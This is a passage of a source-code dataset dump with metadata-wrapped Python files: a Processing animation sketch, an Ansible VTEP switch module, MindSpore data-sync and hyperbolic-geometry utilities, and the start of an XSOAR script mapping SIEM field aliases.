commands=commands)\n"},"avg_line_length":{"kind":"number","value":38.6695652174,"string":"38.669565"},"max_line_length":{"kind":"number","value":103,"string":"103"},"alphanum_fraction":{"kind":"number","value":0.6705644255,"string":"0.670564"}}},{"rowIdx":46359,"cells":{"hexsha":{"kind":"string","value":"dbc9b69c59fff01ef0e276b0ea84fad1e309986e"},"size":{"kind":"number","value":818,"string":"818"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"sketches/natureOfCode/chapter01/mover/mover.py"},"max_stars_repo_name":{"kind":"string","value":"kantel/processingpy"},"max_stars_repo_head_hexsha":{"kind":"string","value":"74aae222e46f68d1c8f06307aaede3cdae65c8ec"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":4,"string":"4"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2018-06-03T02:11:46.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2021-08-18T19:55:15.000Z"},"max_issues_repo_path":{"kind":"string","value":"sketches/natureOfCode/chapter01/mover/mover.py"},"max_issues_repo_name":{"kind":"string","value":"kantel/processingpy"},"max_issues_repo_head_hexsha":{"kind":"string","value":"74aae222e46f68d1c8f06307aaede3cdae65c8ec"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"sketches/natureOfCode/chapter01/mover/mover.py"},"max_forks_repo_name":{"kind":"string","value":"kantel/processingpy"},"max_forks_repo_head_hexsha":{"kind":"string","value":"74aae222e46f68d1c8f06307aaede3cdae65c8ec"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_forks_count":{"kind":"number","value":3,"string":"3"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2019-12-23T19:12:51.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2021-04-30T14:00:31.000Z"},"content":{"kind":"string","value":"class Mover(object):\n \n def __init__(self):\n self.location = PVector(random(width), random(height))\n self.velocity = PVector(random(-5, 5), random(-5, 5))\n self.r = 15\n \n def update(self):\n self.location.add(self.velocity)\n \n def display(self):\n stroke(0)\n fill(255, 100, 255)\n ellipse(self.location.x, self.location.y, 2*self.r, 2*self.r)\n \n def checkBoundaries(self):\n if (self.location.x > width + self.r):\n self.location.x = -self.r\n elif (self.location.x < -self.r):\n self.location.x = width + self.r\n \n if (self.location.y > height + self.r):\n self.location.y = -self.r\n elif (self.location.y < -self.r):\n self.location.y = height + self.r\n \n \n \n"},"avg_line_length":{"kind":"number","value":28.2068965517,"string":"28.206897"},"max_line_length":{"kind":"number","value":69,"string":"69"},"alphanum_fraction":{"kind":"number","value":0.5305623472,"string":"0.530562"}}},{"rowIdx":46360,"cells":{"hexsha":{"kind":"string","value":"919f35df2425fa45d68a62ff250d7f7259d01c3d"},"size":{"kind":"number","value":5345,"string":"5,345"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/pn_vtep.py"},"max_stars_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/pn_vtep.py"},"max_issues_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/pn_vtep.py"},"max_forks_repo_name":{"kind":"string","value":"tr3ck3r/linklight"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"#!/usr/bin/python\n# Copyright: (c) 2018, Pluribus Networks\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: pn_vtep\nauthor: \"Pluribus Networks (@rajaspachipulusu17)\"\nshort_description: CLI command to create/delete vtep\ndescription:\n - This module can be used to create a vtep and delete a vtep.\noptions:\n pn_cliswitch:\n 
description:\n - Target switch to run the CLI on.\n required: false\n type: str\n state:\n description:\n - vtep configuration command.\n required: false\n choices: ['present', 'absent']\n type: str\n default: 'present'\n pn_name:\n description:\n - vtep name.\n required: false\n type: str\n pn_ip:\n description:\n - Primary IP address.\n required: false\n type: str\n pn_vrouter_name:\n description:\n - name of the vrouter service.\n required: false\n type: str\n pn_virtual_ip:\n description:\n - Virtual/Secondary IP address.\n required: false\n type: str\n pn_location:\n description:\n - switch name.\n required: false\n type: str\n pn_switch_in_cluster:\n description:\n - Tells whether switch in cluster or not.\n required: false\n type: bool\n default: True\n'''\n\nEXAMPLES = \"\"\"\n- name: create vtep\n pn_vtep:\n pn_cliswitch: 'sw01'\n pn_name: 'foo'\n pn_vrouter_name: 'foo-vrouter'\n pn_ip: '22.22.22.2'\n pn_location: 'sw01'\n pn_virtual_ip: \"22.22.22.1\"\n\n- name: delete vtep\n pn_vtep:\n pn_cliswitch: 'sw01'\n state: 'absent'\n pn_name: 'foo'\n\"\"\"\n\nRETURN = \"\"\"\ncommand:\n description: the CLI command run on the target node.\n returned: always\n type: str\nstdout:\n description: set of responses from the vtep command.\n returned: always\n type: list\nstderr:\n description: set of error responses from the vtep command.\n returned: on error\n type: list\nchanged:\n description: indicates whether the CLI caused changes on the target.\n returned: always\n type: bool\n\"\"\"\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible_collections.community.general.plugins.module_utils.network.netvisor.pn_nvos import pn_cli, run_cli\nfrom ansible_collections.community.general.plugins.module_utils.network.netvisor.netvisor import run_commands\n\n\ndef check_cli(module, cli):\n \"\"\"\n This method checks for idempotency using the vtep-show command.\n If a name exists, return True if name exists else False.\n :param module: The Ansible module to 
fetch input parameters\n :param cli: The CLI string\n \"\"\"\n name = module.params['pn_name']\n\n cli += ' vtep-show format name no-show-headers'\n out = run_commands(module, cli)[1]\n\n if out:\n out = out.split()\n\n return True if name in out else False\n\n\ndef main():\n \"\"\" This section is for arguments parsing \"\"\"\n\n state_map = dict(\n present='vtep-create',\n absent='vtep-delete'\n )\n\n argument_spec = dict(\n pn_cliswitch=dict(required=False, type='str'),\n state=dict(required=False, type='str', choices=state_map.keys(), default='present'),\n pn_name=dict(required=False, type='str'),\n pn_ip=dict(required=False, type='str'),\n pn_vrouter_name=dict(required=False, type='str'),\n pn_virtual_ip=dict(required=False, type='str'),\n pn_location=dict(required=False, type='str'),\n pn_switch_in_cluster=dict(required=False, type='bool', default='True')\n )\n\n module = AnsibleModule(\n argument_spec=argument_spec,\n required_if=(\n [\"state\", \"present\", [\"pn_name\", \"pn_ip\", \"pn_vrouter_name\", \"pn_location\"]],\n [\"state\", \"absent\", [\"pn_name\"]],\n ),\n )\n\n # Accessing the arguments\n cliswitch = module.params['pn_cliswitch']\n state = module.params['state']\n name = module.params['pn_name']\n ip = module.params['pn_ip']\n vrouter_name = module.params['pn_vrouter_name']\n virtual_ip = module.params['pn_virtual_ip']\n location = module.params['pn_location']\n switch_in_cluster = module.params['pn_switch_in_cluster']\n\n if switch_in_cluster and not virtual_ip and state == 'present':\n module.exit_json(\n failed=True,\n msg='virtual ip is required when switch is in cluster'\n )\n\n command = state_map[state]\n\n # Building the CLI command string\n cli = pn_cli(module, cliswitch)\n\n NAME_EXISTS = check_cli(module, cli)\n\n cli += ' %s name %s ' % (command, name)\n\n if command == 'vtep-delete':\n if NAME_EXISTS is False:\n module.exit_json(\n skipped=True,\n msg='vtep with name %s does not exist' % name\n )\n\n if command == 'vtep-create':\n 
if NAME_EXISTS is True:\n module.exit_json(\n skipped=True,\n msg='vtpe with name %s already exists' % name\n )\n\n cli += 'vrouter-name %s ' % vrouter_name\n cli += 'ip %s ' % ip\n cli += 'location %s ' % location\n\n if virtual_ip:\n cli += 'virtual-ip %s ' % virtual_ip\n\n run_cli(module, cli, state_map)\n\n\nif __name__ == '__main__':\n main()\n"},"avg_line_length":{"kind":"number","value":26.2009803922,"string":"26.20098"},"max_line_length":{"kind":"number","value":111,"string":"111"},"alphanum_fraction":{"kind":"number","value":0.6400374181,"string":"0.640037"}}},{"rowIdx":46361,"cells":{"hexsha":{"kind":"string","value":"37d2717e8b3e1fa56c025383d7488218b1e125ca"},"size":{"kind":"number","value":2176,"string":"2,176"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"research/cv/swin_transformer/src/data/data_utils/moxing_adapter.py"},"max_stars_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_stars_count":{"kind":"number","value":77,"string":"77"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:37.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-30T13:09:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"research/cv/swin_transformer/src/data/data_utils/moxing_adapter.py"},"max_issues_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n 
\"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":3,"string":"3"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-30T14:44:57.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-14T06:57:57.000Z"},"max_forks_repo_path":{"kind":"string","value":"research/cv/swin_transformer/src/data/data_utils/moxing_adapter.py"},"max_forks_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":24,"string":"24"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:45.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-24T18:45:20.000Z"},"content":{"kind":"string","value":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\n\"\"\"Moxing adapter for ModelArts\"\"\"\n\nimport os\n\n_global_sync_count = 0\n\n\ndef get_device_id():\n device_id = os.getenv('DEVICE_ID', '0')\n return int(device_id)\n\n\ndef get_device_num():\n device_num = os.getenv('RANK_SIZE', '1')\n return int(device_num)\n\n\ndef get_rank_id():\n global_rank_id = os.getenv('RANK_ID', '0')\n return 
int(global_rank_id)\n\n\ndef get_job_id():\n job_id = os.getenv('JOB_ID')\n job_id = job_id if job_id != \"\" else \"default\"\n return job_id\n\n\ndef sync_data(from_path, to_path, threads=16):\n \"\"\"\n Download data from remote obs to local directory if the first url is remote url and the second one is local path\n Upload data from local directory to remote obs in contrast.\n \"\"\"\n import moxing as mox\n import time\n global _global_sync_count\n sync_lock = \"/tmp/copy_sync.lock\" + str(_global_sync_count)\n _global_sync_count += 1\n\n # Each server contains 8 devices as most.\n if get_device_id() % min(get_device_num(), 8) == 0 and not os.path.exists(sync_lock):\n print(\"from path: \", from_path)\n print(\"to path: \", to_path)\n mox.file.copy_parallel(from_path, to_path, threads=threads)\n print(\"===finish data synchronization===\")\n try:\n os.mknod(sync_lock)\n except IOError:\n pass\n print(\"===save flag===\")\n\n while True:\n if os.path.exists(sync_lock):\n break\n time.sleep(1)\n\n print(\"Finish sync data from {} to {}.\".format(from_path, to_path))\n"},"avg_line_length":{"kind":"number","value":29.8082191781,"string":"29.808219"},"max_line_length":{"kind":"number","value":116,"string":"116"},"alphanum_fraction":{"kind":"number","value":0.6530330882,"string":"0.653033"}}},{"rowIdx":46362,"cells":{"hexsha":{"kind":"string","value":"f4352e3f34ff59bdfc8dd2bfbaf3ca6bfe02756d"},"size":{"kind":"number","value":8596,"string":"8,596"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"research/nlp/hypertext/src/poincare.py"},"max_stars_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_stars_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_stars_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n 
\"Apache-2.0\"\n]"},"max_stars_count":{"kind":"number","value":77,"string":"77"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:37.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-30T13:09:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"research/nlp/hypertext/src/poincare.py"},"max_issues_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_issues_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_issues_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_issues_count":{"kind":"number","value":3,"string":"3"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-10-30T14:44:57.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-02-14T06:57:57.000Z"},"max_forks_repo_path":{"kind":"string","value":"research/nlp/hypertext/src/poincare.py"},"max_forks_repo_name":{"kind":"string","value":"leelige/mindspore"},"max_forks_repo_head_hexsha":{"kind":"string","value":"5199e05ba3888963473f2b07da3f7bca5b9ef6dc"},"max_forks_repo_licenses":{"kind":"list like","value":["Apache-2.0"],"string":"[\n \"Apache-2.0\"\n]"},"max_forks_count":{"kind":"number","value":24,"string":"24"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2021-10-15T08:32:45.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-24T18:45:20.000Z"},"content":{"kind":"string","value":"# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY 
KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"poincare file\"\"\"\nimport mindspore.numpy as mnp\nfrom mindspore.nn import Cell, Norm\nfrom mindspore.ops import Shape, ReduceSum, Sqrt, ExpandDims, Tanh, Transpose, matmul, Pow, Reshape, clip_by_value\nimport mindspore.common.dtype as mstype\nfrom src.math_utils import Artanh\n\n\n\nclass LorentzFactors(Cell):\n \"\"\"lorentz_factors class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init\"\"\"\n super(LorentzFactors, self).__init__()\n self.min_norm = min_norm\n self.norm = Norm(axis=-1)\n\n def construct(self, x):\n \"\"\"class construction\"\"\"\n x_norm = self.norm(x)\n return 1.0 / (1.0 - x_norm ** 2 + self.min_norm)\n\n\nclass ClampMin(Cell):\n \"\"\"clamp_min class\"\"\"\n\n def __init__(self):\n \"\"\"init fun\"\"\"\n super(ClampMin, self).__init__()\n self.shape = Shape()\n\n def construct(self, tensor, min1):\n \"\"\"class construction\"\"\"\n min_mask = (tensor <= min1)\n min_mask1 = (tensor >= min1)\n min_add = mnp.ones(self.shape(tensor)) * min1 * min_mask\n return tensor * min_mask1 + min_add\n\n\nclass Proj(Cell):\n \"\"\"proj class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(Proj, self).__init__()\n self.clamp_min = ClampMin()\n self.min_norm = min_norm\n self.norm_k = Norm(axis=-1, keep_dims=True)\n self.maxnorm = 1 - 4e-3\n\n def construct(self, x, c):\n \"\"\"class construction\"\"\"\n norm = self.clamp_min(self.norm_k(x), self.min_norm)\n maxnorm = self.maxnorm / (c ** 0.5)\n cond = norm > maxnorm\n projected = x / norm * maxnorm\n return mnp.where(cond, projected, x)\n\n\nclass Clamp(Cell):\n \"\"\"clamp class\"\"\"\n\n def __init__(self):\n super(Clamp, self).__init__()\n self.shape = Shape()\n\n def construct(self, tensor, min1, max1):\n \"\"\"class construction\"\"\"\n return 
clip_by_value(tensor, min1, max1)\n\n\nclass Logmap0(Cell):\n \"\"\"logmap0 class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(Logmap0, self).__init__()\n self.min_norm = min_norm\n self.norm_k = Norm(axis=-1, keep_dims=True)\n self.artanh = Artanh()\n self.norm_k = Norm(axis=-1, keep_dims=True)\n self.clamp_min = ClampMin()\n\n def construct(self, p, c):\n \"\"\"class construction\"\"\"\n sqrt_c = c ** 0.5\n p_norm = self.clamp_min(self.norm_k(p), self.min_norm)\n scale = 1. / sqrt_c * self.artanh(sqrt_c * p_norm) / p_norm\n return scale * p\n\n\nclass KleinToPoincare(Cell):\n \"\"\"klein to poincare class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init\"\"\"\n super(KleinToPoincare, self).__init__()\n self.min_norm = min_norm\n self.sqrt = Sqrt()\n self.sum = ReduceSum(keep_dims=True)\n self.proj = Proj(self.min_norm)\n\n def construct(self, x, c):\n \"\"\"class construction\"\"\"\n x_poincare = x / (1.0 + self.sqrt(1.0 - self.sum(x * x, -1)))\n x_poincare = self.proj(x_poincare, c)\n return x_poincare\n\n\nclass ToKlein(Cell):\n \"\"\"to klein class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(ToKlein, self).__init__()\n self.min_norm = min_norm\n self.sum = ReduceSum(keep_dims=True)\n self.klein_constraint = KleinConstraint(self.min_norm)\n\n def construct(self, x, c):\n \"\"\"class construction\"\"\"\n x_2 = self.sum(x * x, -1)\n x_klein = 2 * x / (1.0 + x_2)\n x_klein = self.klein_constraint(x_klein)\n return x_klein\n\n\nclass KleinConstraint(Cell):\n \"\"\"klein constraint class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(KleinConstraint, self).__init__()\n self.norm = Norm(axis=-1)\n self.min_norm = min_norm\n self.maxnorm = 1 - 4e-3\n self.shape = Shape()\n self.reshape = Reshape()\n\n def construct(self, x):\n \"\"\"class construction\"\"\"\n last_dim_val = self.shape(x)[-1]\n norm = self.reshape(self.norm(x), (-1, 1))\n maxnorm = self.maxnorm\n cond = norm > maxnorm\n 
x_reshape = self.reshape(x, (-1, last_dim_val))\n projected = x_reshape / (norm + self.min_norm) * maxnorm\n x_reshape = mnp.where(cond, projected, x_reshape)\n x = self.reshape(x_reshape, self.shape(x))\n return x\n\n\nclass EinsteinMidpoint(Cell):\n \"\"\"einstein mindpoint class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(EinsteinMidpoint, self).__init__()\n self.to_klein = ToKlein(min_norm)\n self.lorentz_factors = LorentzFactors(min_norm)\n self.sum = ReduceSum(keep_dims=True)\n self.unsqueeze = ExpandDims()\n self.sumFalse = ReduceSum(keep_dims=False)\n self.klein_constraint = KleinConstraint(min_norm)\n self.klein_to_poincare = KleinToPoincare(min_norm)\n\n def construct(self, x, c):\n \"\"\"class construction\"\"\"\n x = self.to_klein(x, c)\n x_lorentz = self.lorentz_factors(x)\n x_norm = mnp.norm(x, axis=-1)\n # deal with pad value\n x_lorentz = (1.0 - (x_norm == 0.0).astype(mstype.float32)) * x_lorentz\n x_lorentz_sum = self.sum(x_lorentz, -1)\n x_lorentz_expand = self.unsqueeze(x_lorentz, -1)\n x_midpoint = self.sumFalse(x_lorentz_expand * x, 1) / x_lorentz_sum\n x_midpoint = self.klein_constraint(x_midpoint)\n x_p = self.klein_to_poincare(x_midpoint, c)\n return x_p\n\n\nclass ClampTanh(Cell):\n \"\"\"clamp tanh class\"\"\"\n\n def __init__(self):\n \"\"\"init fun\"\"\"\n super(ClampTanh, self).__init__()\n self.clamp = Clamp()\n self.tanh = Tanh()\n\n def construct(self, x, c=15):\n \"\"\"class construction\"\"\"\n return self.tanh(self.clamp(x, -c, c))\n\n\nclass MobiusMatvec(Cell):\n \"\"\"mobius matvec class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(MobiusMatvec, self).__init__()\n self.min_norm = min_norm\n self.norm_k = Norm(axis=-1, keep_dims=True)\n self.artanh = Artanh()\n self.norm_k = Norm(axis=-1, keep_dims=True)\n self.clamp_min = ClampMin()\n self.transpose = Transpose()\n self.clamp_tanh = ClampTanh()\n\n def construct(self, m, x, c):\n \"\"\"class construction\"\"\"\n sqrt_c = c ** 
0.5\n x_norm = self.clamp_min(self.norm_k(x), self.min_norm)\n mx = matmul(x, self.transpose(m, (1, 0)))\n mx_norm = self.clamp_min(self.norm_k(x), self.min_norm)\n t1 = self.artanh(sqrt_c * x_norm)\n t2 = self.clamp_tanh(mx_norm / x_norm * t1)\n res_c = t2 * mx / (mx_norm * sqrt_c)\n cond = mnp.array([[0]] * len(mx))\n res_0 = mnp.zeros(1)\n res = mnp.where(cond, res_0, res_c)\n return res\n\n\nclass Expmap0(Cell):\n \"\"\"expmap0 class\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(Expmap0, self).__init__()\n self.clamp_min = ClampMin()\n self.min_norm = min_norm\n self.clamp_tanh = ClampTanh()\n self.norm_k = Norm(axis=-1, keep_dims=True)\n\n def construct(self, u, c):\n \"\"\"constructfun\"\"\"\n sqrt_c = c ** 0.5\n u_norm = self.clamp_min(self.norm_k(u), self.min_norm)\n gamma_1 = self.clamp_tanh(sqrt_c * u_norm) * u / (sqrt_c * u_norm)\n return gamma_1\n\n\nclass MobiusAdd(Cell):\n \"\"\"mobius add\"\"\"\n\n def __init__(self, min_norm):\n \"\"\"init fun\"\"\"\n super(MobiusAdd, self).__init__()\n self.pow = Pow()\n self.sum = ReduceSum(keep_dims=True)\n self.clamp_min = ClampMin()\n self.min_norm = min_norm\n\n def construct(self, x, y, c, dim=-1):\n \"\"\"constructfun\"\"\"\n x2 = self.sum(self.pow(x, 2), dim)\n y2 = self.sum(self.pow(y, 2), dim)\n xy = self.sum(x * y, dim)\n num = (1 + 2 * c * xy + c * y2) * x + (1 - c * x2) * y\n denom = 1 + 2 * c * xy + c ** 2 * x2 * y2\n return num / self.clamp_min(denom, 
self.min_norm)\n"},"avg_line_length":{"kind":"number","value":30.9208633094,"string":"30.920863"},"max_line_length":{"kind":"number","value":114,"string":"114"},"alphanum_fraction":{"kind":"number","value":0.5916705444,"string":"0.591671"}}},{"rowIdx":46363,"cells":{"hexsha":{"kind":"string","value":"be9a0ae08e5d2b0cf33ab9e197160664f5587480"},"size":{"kind":"number","value":31571,"string":"31,571"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Packs/Base/Scripts/DBotSuggestClassifierMapping/DBotSuggestClassifierMapping.py"},"max_stars_repo_name":{"kind":"string","value":"diCagri/content"},"max_stars_repo_head_hexsha":{"kind":"string","value":"c532c50b213e6dddb8ae6a378d6d09198e08fc9f"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":799,"string":"799"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2016-08-02T06:43:14.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-03-31T11:10:11.000Z"},"max_issues_repo_path":{"kind":"string","value":"Packs/Base/Scripts/DBotSuggestClassifierMapping/DBotSuggestClassifierMapping.py"},"max_issues_repo_name":{"kind":"string","value":"diCagri/content"},"max_issues_repo_head_hexsha":{"kind":"string","value":"c532c50b213e6dddb8ae6a378d6d09198e08fc9f"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n 
\"MIT\"\n]"},"max_issues_count":{"kind":"number","value":9317,"string":"9,317"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2016-08-07T19:00:51.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-03-31T21:56:04.000Z"},"max_forks_repo_path":{"kind":"string","value":"Packs/Base/Scripts/DBotSuggestClassifierMapping/DBotSuggestClassifierMapping.py"},"max_forks_repo_name":{"kind":"string","value":"diCagri/content"},"max_forks_repo_head_hexsha":{"kind":"string","value":"c532c50b213e6dddb8ae6a378d6d09198e08fc9f"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":1297,"string":"1,297"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2016-08-04T13:59:00.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-03-31T23:43:06.000Z"},"content":{"kind":"string","value":"from CommonServerPython import *\n\nimport itertools\nimport numbers\nimport re\nimport socket\nfrom collections import Counter\nfrom collections import OrderedDict\nfrom datetime import datetime, timedelta\n\nINCIDENT_FIELD_NAME = \"name\"\nINCIDENT_FIELD_MACHINE_NAME = \"cliName\"\nINCIDENT_FIELD_SYSTEM = \"system\"\n\nSAMPLES_INCOMING = 'incomingSamples'\nSAMPLES_SCHEME = 'scheme'\nSAMPLES_OUTGOING = 'outgoingSamples'\n\nCOUNT_KEYWORD = \"count\"\n\nSIEM_FIELDS = {'Account ID': {'aliases': ['accountid', 'account id'],\n 'validators': []},\n 'Account Name': {'aliases': ['accountname', 'account name'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'Account Type': {'aliases': ['accounttype', 'account type'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Agent ID': {'aliases': ['agentid', 'agent id', 'sensor id', 'tenant id'],\n 'validators': []},\n\n 'Tenant Name': {'aliases': ['tenant name', 'tenant name'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'App': {'aliases': 
['app', 'app'], 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Attachment Name': {'aliases': ['attachmentname', 'attachment name'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Blocked Action': {'aliases': ['blockedaction', 'blocked action', 'prevention mode'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'City': {'aliases': ['city'], 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Command Line': {'aliases': ['commandline', 'command line', 'cmdline', 'cmd line', 'process file name',\n 'process file path',\n 'process full path', 'process full path', 'cmd'],\n 'validators': ['validate_file_full_path']},\n\n 'Event ID': {'aliases': ['eventid', 'event id', 'alert id', 'offense id'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n 'Event Type': {'aliases': ['eventtype', 'event type', 'alert type'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Company Name': {'aliases': ['companyname',\n 'company name',\n 'company',\n 'customer'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Country': {'aliases': ['country', 'country name'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Critical Assets': {'aliases': ['criticalassets', 'critical assets'],\n 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Description': {'aliases': ['description'], 'validators': ['validate_alphanumeric_with_common_punct']},\n\n 'Destination IP': {'aliases': ['destinationip',\n 'destination ip',\n 'destination address',\n 'dest ip',\n 'dest address',\n 'target address',\n 'dst'],\n 'validators': ['validate_ip']},\n 'Destination Port': {'aliases': ['destinationport',\n 'destination port',\n 'dst port',\n 'dest port'],\n 'validators': 